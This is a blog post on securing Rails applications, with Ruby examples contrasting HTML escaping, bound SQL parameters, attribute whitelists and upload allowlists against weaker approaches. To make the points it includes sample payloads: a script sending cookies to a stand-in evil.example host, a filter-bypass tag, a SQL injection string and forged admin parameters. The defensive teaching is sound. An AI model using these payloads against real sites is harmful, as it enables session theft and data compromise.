Smorgasbord - Politics, Lisp, Rails, Fencing, etc.

My musings on an assortment of things ranging from politics, computer technology and programming to sports.

Wednesday, May 03, 2006

Securing Rails application

Using Ruby on Rails has been fun. An important part of developing a web application is making sure that the common security holes are plugged. Here are a few basic things that should be checked and fixed in any security audit:


  • Users trying to execute JavaScript or insert HTML, i.e. Cross-Site Scripting (XSS, sometimes written CSS).
    http://manuals.rubyonrails.com/read/chapter/44 provides a tutorial on this, but the basic idea is to run everything a user has entered through the HTML-escaping helper `h' (or `sanitize') whenever it is displayed. That includes data rendered into XML/RSS feeds, not just HTML pages. Of the two, `h' is the safer default: it escapes every character that could start a tag, so the browser only ever sees text. `sanitize' tries to let some markup through and strip the dangerous parts, and that kind of filtering is much harder to get right, so assume it still has holes.

  • SQL Injection, or a user maliciously inserting SQL statements into your queries.
    http://manuals.rubyonrails.com/read/chapter/43
    again has a tutorial chapter on this. The key point is to avoid writing SQL directly; where you do need to, never embed user input in the SQL string by interpolation, as in

    :conditions => "subject = '#{params[:subject]}'"

    but pass the value as a bind parameter instead, so that ActiveRecord quotes it:

    :conditions => ["subject = ?", params[:subject]]

    Also, make sure the production web server does not echo errors (including failed SQL) back to the user.
    Rails makes it so easy to avoid the common SQL injection attacks, whereas I remember working in a corporate environment using PHP, where almost every SQL statement in the code was open to SQL injection.

  • Creating records directly from form parameters.
    Another chapter, http://manuals.rubyonrails.com/read/chapter/47, gives the details. The key point is that when a record is built or updated en masse from the params hash (via `new' or `update_attributes'), every column is writable by default, including ones the form never showed, such as an admin flag. Use `attr_protected' to blacklist such fields, or better `attr_accessible' to whitelist the ones a form may set; the whitelist is the more secure choice because a column you forget is protected rather than exposed.

  • Not exposing controller methods.
    With the default routes, every public method on a controller is reachable as an action by URL. Make helper methods that should not be callable by the user `private' or `protected'.

  • Checking file/attachment uploads.
    It is generally safer to store the files in the database than under the web root. Check the size of the file being uploaded and make sure that it doesn't exceed the permissible limit. Also check the file extension against a list of the extensions you actually accept (images, PDFs and so on); a blacklist of `*.cgi', `*.php', `*.js' etc. is weaker, because it misses variants such as `.PHP' or `.phtml' that the server may still execute. Never reuse the filename the client sent as a path on the server.

  • Be careful about ID parameters.
    For certain operations, for example displaying an email, a user should only be able to read his or her own email, yet the id in the URL can be changed to any value. So in the email-displaying controller, don't fetch the record by id alone: check that the logged-in user owns it, or better, look it up through the logged-in user's own association so that somebody else's id is simply not found.
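The XSS point above, as an added example (this is not code from the post or from Rails): `h` in Rails is `ERB::Util.html_escape`, so it can be run outside Rails. Beside it is a hand-written blacklist filter, constructed here only to show why pattern-stripping is weaker than escaping; the hostile inputs are constructed as well.

```ruby
require 'erb'

# Rails' `h` helper is ERB::Util.html_escape: &, <, >, " (and ') become
# entities, so whatever the user typed is rendered as text, never as markup.
def h(text)
  ERB::Util.html_escape(text.to_s)
end

# A hand-rolled blacklist filter of the kind that stands in for `sanitize`
# in many apps (constructed for this example, not Rails' implementation):
# strip <script>...</script> blocks and pass everything else through.
def naive_sanitize(text)
  text.to_s.gsub(%r{<script\b[^>]*>.*?</script>}im, '')
end

# Is there still something that can open a tag? Escaped output never has a
# literal '<', so it can't; filtered output may.
def tag_opener?(html)
  !!(html =~ %r{<[A-Za-z/!]})
end

# Constructed user inputs: a harmless comment and three hostile ones.
INPUTS = {
  plain:  'Great post, thanks!',
  script: '<script>document.location="http://evil.example/?c="+document.cookie</script>',
  # no <script> at all, so the blacklist never fires
  img:    '<img src="x" onerror="alert(1)">',
  # the blacklist removes the inner tags and reassembles a real <script>
  nested: '<scr<script></script>ipt>alert(1)</scr<script></script>ipt>'
}.freeze

# For each input: does the output of each approach still carry markup?
def compare(inputs = INPUTS)
  inputs.transform_values do |raw|
    { escaped:          h(raw),
      filtered:         naive_sanitize(raw),
      escaped_has_tag:  tag_opener?(h(raw)),
      filtered_has_tag: tag_opener?(naive_sanitize(raw)) }
  end
end

if __FILE__ == $0
  compare.each do |name, r|
    puts "#{name}:"
    puts "  h        -> #{r[:escaped]}  (tag? #{r[:escaped_has_tag]})"
    puts "  filtered -> #{r[:filtered]}  (tag? #{r[:filtered_has_tag]})"
  end
end
```

Escaping wins on every input because it does not need to know what is dangerous; the filter has to enumerate dangerous constructs, and both the event-handler attribute and the nested-tag trick fall outside its list.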
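The SQL injection point above, as an added example (written for this post, not ActiveRecord's code): a small stand-in for what the conditions array does, with each `?` replaced by the value quoted as a SQL literal, next to the interpolated form. The hostile subject line and the table name are constructed.

```ruby
# Stand-in for what ActiveRecord does with a conditions array such as
# ["subject = ?", params[:subject]]: each ? is replaced by the value *quoted
# as a SQL literal*.  Written for this post; in Rails the quoting belongs to
# the database adapter (connection.quote), which knows the server's rules.
def quote(value)
  case value
  when nil     then 'NULL'
  when Numeric then value.to_s
  else "'" + value.to_s.gsub("'", "''") + "'"   # standard SQL: a quote inside a literal is doubled
  end
end

def sanitize_sql_array(sql, *values)
  parts = sql.split('?', -1)                     # -1 keeps a trailing empty piece
  unless parts.size - 1 == values.size
    raise ArgumentError, "expected #{parts.size - 1} bind values, got #{values.size}"
  end
  parts.zip(values.map { |v| quote(v) } + ['']).flatten.join
end

# The two ways of writing the query from the post.  `interpolated` is the
# pattern to avoid; `bound` is the conditions-array pattern.
def interpolated(subject, user_id)
  "SELECT * FROM emails WHERE user_id = #{user_id} AND subject = '#{subject}'"
end

def bound(subject, user_id)
  'SELECT * FROM emails WHERE ' +
    sanitize_sql_array('user_id = ? AND subject = ?', user_id, subject)
end

# Constructed hostile input: closes the literal and appends an always-true clause.
HOSTILE_SUBJECT = "x' OR '1'='1"

# Count the comparisons the SQL parser would see outside string literals: a
# query meant to have two that ends up with three has been injected into.
def comparisons_outside_literals(sql)
  sql.gsub(/'(?:[^']|'')*'/, "''").scan(/=/).size
end

if __FILE__ == $0
  puts interpolated(HOSTILE_SUBJECT, 7)   # the OR clause is live SQL
  puts bound(HOSTILE_SUBJECT, 7)          # the whole subject is one literal
end
```

Two caveats for real code: Rails 1.x does this substitution on the client side rather than using server-side prepared statements, so the adapter's quoting must match the server (the MySQL adapter also escapes backslashes, which the plain doubling above does not); and binding only protects values, so a column or table name taken from the user still has to be checked against a fixed list.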

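The mass-assignment point above, as an added example (a stand-in written for this post, not ActiveRecord): a tiny model base class whose `attributes=` honours an `attr_accessible` whitelist, and a forged signup request with an extra `admin` field. The model, its columns and the request are all made up.

```ruby
# Stand-in for the ActiveRecord behaviour the post warns about: building a
# record from the params hash (new(params[:user]) / update_attributes) assigns
# every submitted key unless the model declares a whitelist.  Example code
# written for this post, not ActiveRecord; the attribute names are invented.
class MiniModel
  attr_reader :attributes

  def self.attr_accessible(*names)
    @accessible = names.map(&:to_s)
  end

  # nil means no whitelist was declared: everything is assignable (the default)
  def self.accessible_attributes
    @accessible
  end

  def initialize(params = {})
    @attributes = { 'name' => nil, 'email' => nil, 'admin' => false }
    self.attributes = params
  end

  # Like ActiveRecord's attributes=: a key outside the whitelist is dropped;
  # a key that is not a column at all is an error.
  def attributes=(params)
    allowed = self.class.accessible_attributes
    params.each do |key, value|
      key = key.to_s
      raise ArgumentError, "unknown attribute #{key}" unless @attributes.key?(key)
      next if allowed && !allowed.include?(key)
      @attributes[key] = value
    end
  end

  def admin?
    @attributes['admin'] == true || @attributes['admin'].to_s == '1'
  end
end

# No protection: whatever the form posts gets written.
class OpenUser < MiniModel
end

# Only the two fields the signup form legitimately contains may be set.
class SafeUser < MiniModel
  attr_accessible :name, :email
end

# Constructed request: a signup form to which the client added a hidden
# field user[admin]=1 (Rails parses user[admin] into params['user']['admin']).
FORGED_PARAMS = { 'name' => 'mallory', 'email' => 'mallory@example.com', 'admin' => '1' }.freeze

def privilege_escalated?(model_class, params = FORGED_PARAMS)
  model_class.new(params).admin?
end

if __FILE__ == $0
  puts "OpenUser admin? #{privilege_escalated?(OpenUser)}"   # true
  puts "SafeUser admin? #{privilege_escalated?(SafeUser)}"   # false
end
```

The same forged request produces an administrator in `OpenUser` and an ordinary user in `SafeUser`; the extra key is dropped without the controller having to know it was ever sent.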
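The upload point above, as an added example (written for this post, not Rails code): a size ceiling plus an extension allowlist, next to the blacklist written the obvious way so the difference shows. The allowed extensions, the size limit and the sample filenames are assumptions; in a Rails 1.x controller the two inputs would come from `params[:file].original_filename` and `params[:file].size`.

```ruby
# Upload checks written for this post (not Rails code).  Only the client's
# filename and the byte count are needed.
ALLOWED_EXTENSIONS = %w[jpg jpeg png gif pdf].freeze   # what this app accepts (assumption)
MAX_BYTES = 2 * 1024 * 1024                            # 2 MB ceiling (assumption)

class UploadRejected < StandardError; end

# Strip any directory part the browser sent (old IE sent the full C:\... path)
# so the client's name is never used as a filesystem path.
def client_basename(original_filename)
  original_filename.to_s.split(%r{[\\/]}).last.to_s
end

def validate_upload(original_filename, size)
  raise UploadRejected, "file too large (#{size} bytes)" if size > MAX_BYTES
  name = client_basename(original_filename)
  ext  = File.extname(name).sub(/\A\./, '').downcase    # compare case-insensitively
  raise UploadRejected, 'missing extension' if ext.empty?
  unless ALLOWED_EXTENSIONS.include?(ext)
    raise UploadRejected, "extension .#{ext} not allowed"
  end
  { name: name.gsub(/[^A-Za-z0-9._-]/, '_'), extension: ext, size: size }
end

def upload_ok?(original_filename, size)
  validate_upload(original_filename, size)
  true
rescue UploadRejected
  false
end

# The post's blacklist, written the obvious way, for contrast.
DENYLIST = %w[cgi php js].freeze

def denylist_passes?(original_filename)
  ext = File.extname(client_basename(original_filename)).sub(/\A\./, '')
  !DENYLIST.include?(ext)
end

if __FILE__ == $0
  %w[photo.JPG shell.PHP shell.phtml shell.php].each do |f|
    puts "#{f}: allowlist=#{upload_ok?(f, 1024)} denylist=#{denylist_passes?(f)}"
  end
end
```

`shell.PHP` and `shell.phtml` both slip past the blacklist (one by case, one by an extension that was never listed although many PHP setups execute it) and both are refused by the allowlist, which only has to be right about what the application actually wants.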
Remember, a chain is only as strong as its weakest link.
